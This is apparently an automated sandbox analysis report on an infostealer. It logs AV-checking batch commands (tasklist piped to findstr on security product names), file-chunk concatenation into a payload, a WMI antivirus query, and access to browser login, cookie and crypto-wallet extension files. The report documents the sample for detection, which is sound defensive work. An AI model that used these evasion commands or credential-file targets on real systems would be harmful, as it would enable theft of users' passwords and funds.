            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045C8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: powershell.exe, 00000011.00000002.2880384967.00000000075EB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Contrast.com, 0000000A.00000003.2545727307.00000000045BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | API call chain: ExitProcess graph end node (graph_10-97808)
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | API call chain: ExitProcess graph end node (graph_10-97913)
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005845D5 BlockInput,10_2_005845D5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00525240
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00545CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00545CAC
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005688CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_005688CD
            Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053A354 SetUnhandledExceptionFilter,10_2_0053A354
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0053A385
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00569369 LogonUserW,10_2_00569369
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00525240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00525240
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00571AC6 SendInput,keybd_event,10_2_00571AC6
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005751E2 mouse_event,10_2_005751E2
            Source: C:\Users\user\Desktop\'Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 108941
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Contrast.com A
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_005688CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_005688CD
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00574F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00574F1C
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000483F000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000000.2061161368.00000000005C6000.00000002.00000001.01000000.00000007.sdmp, Contrast.com.2.dr, Set.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Contrast.com | Binary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0053885B cpuid 10_2_0053885B
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00550030 GetLocalTime,__swprintf,10_2_00550030
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_00550722 GetUserNameW,10_2_00550722
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Code function: 10_2_0054416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_0054416A
            Source: C:\Users\user\Desktop\'Setup.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0`
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ctrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wal
            Source: Contrast.com, 0000000A.00000003.2635862336.0000000004546000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: -store.json",".finger-print.fp","simple-storage.json","window-state.jsonB
            Source: Contrast.com, 0000000A.00000003.2635862336.0000000004546000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: flelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum",
            Source: Contrast.com, 0000000A.00000003.2635862336.0000000004546000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: powershell.exe, 0000000E.00000002.2860084189.0000000007090000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
